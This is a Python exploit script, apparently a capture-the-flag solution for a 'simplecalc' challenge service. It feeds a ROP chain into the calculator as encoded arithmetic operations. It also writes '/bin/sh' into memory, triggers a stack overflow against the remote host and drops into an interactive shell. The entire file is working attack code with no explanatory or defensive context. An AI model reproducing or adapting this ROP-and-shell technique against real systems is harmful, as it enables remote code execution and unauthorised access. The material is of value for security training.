from codez import *

def encode_payload(payload):
    r = []
    for c in chunks(payload,4):
        val = unpack('i',c)[0]
        if (val/2) > 0x27:
            r.append((1,val/2,val/2+val%2))
        else:
            r.append((2,0x100 + val,0x100))
    return r

p = pack('Q',0x6c4aa0+16) * (72/8) 
#p = "\x00"*72 uncoment for simple version
rop = [
    0x44db34,
    0x3b,
    0x401b73,
    0x6C4A80, 
    0x401c87,
    0,
    0x437a85,
    0,
    0x4648e5
]
p += ''.join(map(lambda x:pack('Q',x),rop))
#p = p.ljust(252*4,'a')
#r = Remote('localhost',1234)
r = Remote('simplecalc.bostonkey.party',5500)
r.read(':')
r.sendline('255')
#raw_input('dbg')
for cmd,x,y in encode_payload(p):
    r.sendline(str(cmd))
    r.read(':')
    r.sendline(str(x))
    r.read(':')
    r.sendline(str(y))
## push /bin/sh
r.sendline(str(1))
r.read(':')
r.sendline('1852400175')
r.read(':')
r.sendline('6845231')
## --- this can be removed in simple version --- 
r.sendline(str(3))
r.read(':')
r.sendline("%d"%-0x21)
r.read(':')
r.sendline('%d'%-1)
## --- end ---

r.sendline('5')


r.interactive()